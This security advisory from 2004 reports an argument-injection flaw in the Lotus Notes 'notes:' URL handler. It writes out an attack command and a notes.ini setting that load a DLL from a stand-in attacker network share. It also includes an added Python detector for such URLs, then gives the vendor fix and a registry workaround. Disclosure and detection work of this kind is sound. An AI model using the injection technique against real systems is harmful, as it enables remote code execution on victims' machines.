
lotus.inject.txt

Posted Jun 27, 2004
Authored by Jouko Pynnonen | Site klikki.fi

During the client-side Windows installation of Lotus Notes, a notes: URL handler is registered in the registry. An argument injection attack allows an intruder to pass command line arguments to notes.exe, which can lead to execution of arbitrary code.

tags | advisory, arbitrary, registry
systems | windows
SHA-256 | 7f1d5d7fa6e4854573d335dc29ba01617e06478c0fbeabab00dc2a8338959037



OVERVIEW
========

Lotus Notes is a groupware/e-mail system developed by Lotus Software.
Due to its security and collaboration features it's used particularly
by large organizations, government agencies, etc. IBM estimates it is
used by 60 million people.

During the client-side Windows installation of Lotus Notes, a "notes:"
URL handler is registered in the registry. An argument injection
attack allows an intruder to pass command line arguments to notes.exe,
which can lead to execution of arbitrary code.



DETAILS
=======

The installed registry entry causes any "notes:" URL to be opened with
notes.exe, with the URL passed as the argument. If the URL contains
space characters, notes.exe takes the characters after the space as a
second command line argument. Any web page can cause notes.exe to be
started in this way by referring to a notes: URL.

The location of the Notes configuration file, notes.ini, can be
specified on the command line by prefixing it with an equals sign (=).
The notes.ini file can be located on a network share. An attacker can
use the URL to specify an arbitrary notes.ini file located on a public
network share, so that the command run when opening the URL would be
e.g.

notes.exe =\\attacker.server\notes\notes.ini

The notes.ini file contains the location of the Notes data directory,
which in this case can also be located on a public network share. The
notes.ini file could contain e.g.

[Notes]
Directory=\\attacker.server\\notes

The program uses this directory to load some dynamic libraries.
The attacker can place arbitrary code in the init section of such a
DLL and cause it to be run during notes.exe startup. The scenario was
successfully tested with an exploit. On opening the malicious web
page, the victim system downloaded the DLL and ran the code in it.

The exploit requires that notes.exe isn't already running while the
victim views the malicious web page or e-mail message, because DLLs
are only loaded on program startup. It also requires that outgoing
connections to Internet shares aren't blocked by firewalls or registry
settings.
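
A detection sketch for the pattern described above, added here as an
example and not part of the original advisory: it flags notes: URLs in
HTML whose decoded form carries an extra whitespace-separated argument,
in particular an =-prefixed notes.ini path on a UNC share. The function
names, finding labels and sample hosts are assumptions constructed for
illustration.

```python
import re
from urllib.parse import unquote

# Matches notes: URLs inside quoted HTML attribute values.
NOTES_ATTR = re.compile(r"""["'](notes:[^"']*)["']""", re.IGNORECASE)
UNC = re.compile(r"^\\\\[^\\]+\\")  # \\host\share...

def inspect_notes_url(url):
    """Return a list of findings for one notes: URL (empty list = clean)."""
    findings = []
    # Assumption: treat percent-encoded whitespace like literal whitespace,
    # since the URL may be decoded before it reaches the handler.
    parts = unquote(url).split()
    if len(parts) > 1:
        # Anything after the first space becomes a separate argument.
        findings.append("extra-argument")
    for arg in parts[1:]:
        if arg.startswith("="):
            # "=" prefix selects an alternative notes.ini.
            findings.append("ini-override")
            if UNC.match(arg[1:]):
                findings.append("remote-ini")
    return findings

def scan_html(html):
    """Map each flagged notes: URL found in html to its findings."""
    hits = {}
    for url in NOTES_ATTR.findall(html):
        found = inspect_notes_url(url)
        if found:
            hits[url] = found
    return hits

# Constructed sample markup; host names are placeholders.
SAMPLE = r'''
<a href="notes://mail.example.internal/inbox.nsf">Open inbox</a>
<a href="notes:x =\\files.example.invalid\share\notes.ini">Report</a>
<a href="notes:x%20=\\files.example.invalid\share\notes.ini">Report</a>
'''

if __name__ == "__main__":
    for url, found in scan_html(SAMPLE).items():
        print(url, "->", ", ".join(found))
```

The same check can be run over mail bodies or proxy-captured pages; a
clean notes: link produces no findings.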



SOLUTION
========

IBM was contacted on March 17, 2004. The fix SPR# KSPR5X6VEA has now
been released to solve the issue. As a workaround, the registry key

HKEY_CLASSES_ROOT\Notes\Shell\Open\Command

can be removed.



CREDITS
=======

The vulnerability was discovered and researched by Jouko Pynnönen,
Finland.




--
Jouko Pynnönen Web: http://iki.fi/jouko/
jouko@iki.fi GSM: +358 41 5504555